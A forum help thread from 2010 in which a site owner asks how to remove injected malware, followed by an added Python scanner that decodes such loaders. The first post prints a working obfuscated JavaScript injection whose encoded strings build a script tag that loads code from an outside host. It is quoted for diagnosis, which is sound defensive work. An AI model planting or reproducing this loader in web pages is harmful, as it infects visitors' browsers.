Hacked Site. Please help!


ryancooper
05-04-2010, 11:30 AM
Hello,
I am hoping someone can help me out here. My site is being reported as being infected with malware. If I look at the source code I can see

http://www.talkdisney.com/forums/wdw-theme-parks/

<script type="text/javascript">
var RSrAHsQFTSZ = "GXlLD17GXlLD29"; var rTOwsCKOsBB0 = "GXlLD3cGXlLD73GXlLD"; var rTOwsCKOsBB1 = "63GXlLD72GXlLD69GXl"; var rTOwsCKOsBB2 = "LD70GXlLD74GXlLD20G"; var rTOwsCKOsBB3 = "XlLD73GXlLD72GXlLD6"; var rTOwsCKOsBB4 = "3GXlLD3dGXlLD22GXlL"; var rTOwsCKOsBB5 = "D68GXlLD74GXlLD74GX"; var rTOwsCKOsBB6 = "lLD70GXlLD3aGXlLD2f"; var rTOwsCKOsBB7 = "GXlLD2fGXlLD78GXlLD"; var rTOwsCKOsBB8 = "74GXlLD6fGXlLD70GXl"; var rTOwsCKOsBB9 = "LD2eGXlLD73GXlLD65G"; var rTOwsCKOsBB10 = "XlLD72GXlLD76GXlLD6"; var rTOwsCKOsBB11 = "5GXlLD70GXlLD69GXlL"; var rTOwsCKOsBB12 = "D63GXlLD73GXlLD2eGX"; var rTOwsCKOsBB13 = "lLD63GXlLD6fGXlLD6d"; var rTOwsCKOsBB14 = "GXlLD2fGXlLD2fGXlLD"; var rTOwsCKOsBB15 = "6dGXlLD6cGXlLD2eGXl"; var rTOwsCKOsBB16 = "LD70GXlLD68GXlLD70G"; var rTOwsCKOsBB17 = "XlLD22GXlLD3eGXlLD2"; var rTOwsCKOsBB18 = "0GXlLD3cGXlLD2fGXlL"; var rTOwsCKOsBB19 = "D73GXlLD63GXlLD72GX"; var rTOwsCKOsBB20 = "lLD69GXlLD70GXlLD74"; var rTOwsCKOsBB21 = "GXlLD3e"; var ZrWBlSVWKBL = "MWp2m17GXlLD29"; var GwA9juVrobG = rTOwsCKOsBB0 + rTOwsCKOsBB1 + rTOwsCKOsBB2 + rTOwsCKOsBB3 + rTOwsCKOsBB4 + rTOwsCKOsBB5 + rTOwsCKOsBB6 + rTOwsCKOsBB7 + rTOwsCKOsBB8 + rTOwsCKOsBB9 + rTOwsCKOsBB10 + rTOwsCKOsBB11 + rTOwsCKOsBB12 + rTOwsCKOsBB13 + rTOwsCKOsBB14 + rTOwsCKOsBB15 + rTOwsCKOsBB16 + rTOwsCKOsBB17 + rTOwsCKOsBB18 + rTOwsCKOsBB19 + rTOwsCKOsBB20 + rTOwsCKOsBB21; var wa79vdAM5Lo = "wqOw517CEXvL29"; tZlMHObzT1T = GwA9juVrobG.replace(/GXlLD/g,"%"); var FwL4HjvTvmP=unescape;var RSrAHsQFTSZ = "CEXvL17MWp2m29"; q9124=this; var Bu91Qzp2Fxa= q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")]; Bu91Qzp2Fxa.write(FwL4HjvTvmP(tZlMHObzT1T));
</script>


But I can not find this in the templates or database to remove it. Any ideas on how to fix this?


After a little more research it also seems to only show up in IE, not in Firefox?
Thanks,
ryan

kylek
05-04-2010, 07:08 PM
Tried to look at your site but Avast popped up a "malicious URL blocked" warning. Info might help you, will send it via PM.

ZomgStuff
05-05-2010, 07:04 AM
I had a very similar problem just recently. Do you happen to have MGC chatbox installed?

You should look through your .js files, as that's where I found lots of copies of it.

ryancooper
05-05-2010, 01:02 PM
@Kylek thanks for the info in PM. Looking now but so far no luck.

@ZomgStuff - What did you look for in the .js files?

Thanks for any help!

TheLastSuperman
05-05-2010, 05:43 PM
If you have a custom mod like a chatbox or any custom mods simply replace all the .js files of that mod w/ a fresh downloaded copy.

AdminCP > Maintenance > Diagnostics > Suspect File Versions

*Now, not all files are "suspect" or "bad", but that will help you track down the files if you are unaware of them all. Be sure to check your .js files as mentioned above, and also check your templates for any iframes, so search in templates for

<IFRAME SRC="whatever.html"

Leave the part after the = off so you can find all instances. Some of these malicious scripts utilize iframes; there is a currently popular iframe and JS baddy for WordPress atm, so if you have that installed this could be the aftermath if they hacked your site via an exploit.

ryancooper
05-05-2010, 05:56 PM
Found it in my vbseo config file. No idea how it got there but it's gone now. Thanks for all your help.

legacy123
05-05-2010, 07:20 PM
I would definitely secure your files after seeing that.
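
The file check suggested in this thread, as an added example that is not part of any post: it walks every file under a directory (not only .js files and templates, since the injection here turned up in a config file), flags `<iframe src=` markup, and statically decodes loaders built like the posted snippet (string fragments joined, a filler token replaced with `%`, then `unescape`) without executing anything. The function names, the `ZqZq` token and the sample string are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote

LITERAL_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;')        # var a = "text";
CONCAT_RE = re.compile(r'(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*;')   # x = a + b + c;
SWAP_RE = re.compile(r'(\w+)\.replace\(/(\w+)/g\s*,\s*"%"\)')       # x.replace(/TOKEN/g,"%")
IFRAME_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=', re.IGNORECASE)

# Constructed, benign sample in the same style as the posted snippet; decodes to <i>ok</i>.
SAMPLE = ('var a0 = "ZqZq3cZqZq69ZqZq3eZq"; var a1 = "Zq6fZqZq6bZqZq3cZqZq"; '
          'var a2 = "2fZqZq69ZqZq3e"; var j = a0 + a1 + a2; '
          'k = j.replace(/ZqZq/g,"%"); var u=unescape; document.write(u(k));')

def decode_injection(text):
    """Return the markup a split-string/unescape loader would write, or None.
    Works on the text only; nothing from the file is executed."""
    swap = SWAP_RE.search(text)
    if not swap:
        return None
    source, token = swap.groups()
    literals = dict(LITERAL_RE.findall(text))
    for name, expr in CONCAT_RE.findall(text):
        if name == source:
            # Join the fragments in the order the script concatenates them.
            literals[source] = ''.join(literals.get(p.strip(), '') for p in expr.split('+'))
    if source not in literals:
        return None
    # JavaScript unescape() maps each %XX to a single Latin-1 character.
    return unquote(literals[source].replace(token, '%'), encoding='latin-1')

def scan_tree(root):
    """Check every file under root (any extension) and return (path, finding) pairs."""
    findings = []
    for path in sorted(Path(root).rglob('*')):
        if not path.is_file():
            continue
        text = path.read_text(encoding='latin-1')  # latin-1 never fails to decode
        decoded = decode_injection(text)
        if decoded is not None:
            findings.append((str(path), 'obfuscated loader writes: ' + decoded))
        elif IFRAME_RE.search(text):
            findings.append((str(path), 'iframe with src attribute'))
    return findings

if __name__ == '__main__':
    print(decode_injection(SAMPLE))
```

An iframe hit is only a lead to review by hand, since legitimate templates use iframes too; a decoded loader shows exactly what markup the page would have written.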